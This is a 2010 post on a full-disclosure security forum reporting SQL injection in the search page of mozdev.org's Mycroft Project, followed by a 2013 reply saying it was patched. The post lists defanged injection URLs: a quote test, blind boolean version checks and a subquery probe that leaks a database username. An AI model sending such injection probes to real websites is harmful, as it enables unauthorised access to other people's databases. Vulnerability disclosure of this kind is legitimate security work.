Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: VMw4r3
Date: August 23, 2010 04:46PM

mozdev.org

Mycroft Project is vulnerable to sql injection.

Injection:

hxxp://mycroft.mozdev.org/search-engines.html?category=64'



Mysql version check:

hxxttp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true




hxxp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false



Error generated looking for inexistent user table:

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'







http://vmw4r3.blogspot.com/

Options: ReplyQuote
Re: mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: us3r
Date: July 03, 2013 12:01PM

After 3 years the site has been patching! :)

Options: ReplyQuote


Sorry, only registered users may post in this forum.